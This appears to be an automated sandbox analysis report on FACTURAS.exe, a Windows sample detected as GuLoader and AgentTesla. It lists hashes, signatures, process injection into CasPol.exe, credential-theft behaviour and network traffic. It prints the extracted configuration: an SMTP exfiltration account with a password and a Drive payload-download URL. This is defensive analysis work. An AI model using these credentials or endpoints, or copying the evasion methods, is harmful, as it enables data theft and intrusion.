Play interactive tour

Edit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:	FACTURAS.exe
Analysis ID:	531838
MD5:	ab82f374210a08b2221d5e1807400a32
SHA1:	6a56b81549185015743deaa196996f73787c5c7d
SHA256:	ab41887e471ac822f1240bf554098fa042910f1c7ac2f9e390081829515bc2fa
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Contains functionality to detect virtual machines (SMSW)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

System is w10x64native

FACTURAS.exe (PID: 592 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: AB82F374210A08B2221D5E1807400A32)

CasPol.exe (PID: 432 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.24364934028.0000000001100000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: CasPol.exe PID: 1268	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 1268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000005.00000000.24364934028.0000000001100000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ"}
Source: CasPol.exe.1268.5.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: FACTURAS.exe

ReversingLabs: Detection: 13%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01575088 CryptUnprotectData,		5_2_01575088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01575868 CryptUnprotectData,		5_2_01575868

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49806 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 116.202.203.61 116.202.203.61

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=11UpsPasq_HHo9riShtDnotSECFd2czsi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1oltsnuahdkbclh0bd9255sdi/1638361575000/11612195336931281153/*/11UpsPasq_HHo9riShtDnotSECFd2czsi?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-6k-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49815 -> 116.202.203.61:587

Source: global traffic

TCP traffic: 192.168.11.20:49815 -> 116.202.203.61:587

Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: FACTURAS.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: FACTURAS.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000005.00000002.29204489618.0000000001299000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 00000005.00000003.24568903553.00000000012C3000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569225634.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573156423.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29204597889.00000000012AA000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.24573675447.00000000012C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29222008475.0000000020415000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221327917.0000000020340000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 00000005.00000002.29204489618.0000000001299000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: CasPol.exe, 00000005.00000003.24568903553.00000000012C3000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569225634.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573156423.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29204597889.00000000012AA000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.24573675447.00000000012C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FACTURAS.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: FACTURAS.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: FACTURAS.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: FACTURAS.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp	String found in binary or memory: http://furteksdokuma.com.tr
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: http://kFWRbv.com
Source: CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp	String found in binary or memory: http://mail.furteksdokuma.com.tr
Source: CasPol.exe, 00000005.00000002.29204489618.0000000001299000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29222008475.0000000020415000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221327917.0000000020340000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: FACTURAS.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: FACTURAS.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: FACTURAS.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000002.29216704229.000000001E298000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.25508640034.000000001CFE1000.00000004.00000001.sdmp	String found in binary or memory: https://Z655gVkuIZnhDyQfI.net
Source: CasPol.exe, 00000005.00000002.29216704229.000000001E298000.00000004.00000001.sdmp	String found in binary or memory: https://Z655gVkuIZnhDyQfI.nett-
Source: CasPol.exe, 00000005.00000003.24569436789.00000000012F1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569082493.00000000012F1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000005.00000003.24569436789.00000000012F1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569082493.00000000012F1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000005.00000002.29204294337.0000000001276000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.24569225634.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573156423.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573675447.00000000012C1000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-6k-docs.googleusercontent.com/
Source: CasPol.exe, 00000005.00000003.24573939884.00000000012F1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29204597889.00000000012AA000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0c-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1
Source: CasPol.exe, 00000005.00000002.29203974975.0000000001238000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000005.00000002.29203974975.0000000001238000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/H
Source: CasPol.exe, 00000005.00000002.29205726663.0000000001450000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569225634.00000000012BE000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=11UpsPasq_HHo9riShtDnotSECFd2czsi
Source: CasPol.exe, 00000005.00000002.29216365649.000000001E247000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000005.00000002.29204489618.0000000001299000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 00000005.00000002.29216365649.000000001E247000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: FACTURAS.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=11UpsPasq_HHo9riShtDnotSECFd2czsi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1oltsnuahdkbclh0bd9255sdi/1638361575000/11612195336931281153/*/11UpsPasq_HHo9riShtDnotSECFd2czsi?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-6k-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49806 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00403540	1_2_00403540
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B086B	1_2_023B086B
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B00B5	1_2_023B00B5
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B02A1	1_2_023B02A1
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B1AE1	1_2_023B1AE1
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B1AD8	1_2_023B1AD8
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B0385	1_2_023B0385
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B05F5	1_2_023B05F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00DB0040	5_2_00DB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00DB6988	5_2_00DB6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00DB1420	5_2_00DB1420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01044320	5_2_01044320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01043A50	5_2_01043A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0104BA50	5_2_0104BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0104F758	5_2_0104F758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0104C7B0	5_2_0104C7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01043708	5_2_01043708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_011179D4	5_2_011179D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0136A9F8	5_2_0136A9F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01368490	5_2_01368490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01368F20	5_2_01368F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01361D28	5_2_01361D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01366270	5_2_01366270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01572D00	5_2_01572D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_015719B0	5_2_015719B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01577428	5_2_01577428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01578BD0	5_2_01578BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157E7F8	5_2_0157E7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01577E60	5_2_01577E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157DED5	5_2_0157DED5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157D2E0	5_2_0157D2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157A940	5_2_0157A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157A9A0	5_2_0157A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01570040	5_2_01570040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0157C380	5_2_0157C380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01575E90	5_2_01575E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01730040	5_2_01730040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_017350F8	5_2_017350F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01736C78	5_2_01736C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01736048	5_2_01736048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1E015E08	5_2_1E015E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1E0146C4	5_2_1E0146C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1E016AF1	5_2_1E016AF1

Source: FACTURAS.exe, 00000001.00000000.24153554858.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefilterhjdens.exe vs FACTURAS.exe
Source: FACTURAS.exe, 00000001.00000002.24597665480.00000000022A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefilterhjdens.exeFE2XD vs FACTURAS.exe
Source: FACTURAS.exe	Binary or memory string: OriginalFilenamefilterhjdens.exe vs FACTURAS.exe

Source: FACTURAS.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\FACTURAS.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: FACTURAS.exe

Static PE information: invalid certificate

Source: FACTURAS.exe

ReversingLabs: Detection: 13%

Source: FACTURAS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURAS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURAS.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@6/1@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000005.00000000.24364934028.0000000001100000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040A86B push ebx; retf	1_2_0040A86D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040A00A push EDF1CA21h; ret	1_2_0040A010
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00409212 push ecx; retf	1_2_0040922A
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00404AC6 push ebp; ret	1_2_00404AC7
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00404AD5 push cs; iretd	1_2_00404AD8
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040A2B2 push ss; retf	1_2_0040A2B4
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00406DF9 push edi; iretd	1_2_00406DFA
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B1C3F push EBA42B5Fh; ret	1_2_023B1C44
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B371C push eax; iretd	1_2_023B371F
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023B335A push eax; ret	1_2_023B335B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01733D0A push eax; retf	5_2_01733D51

Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
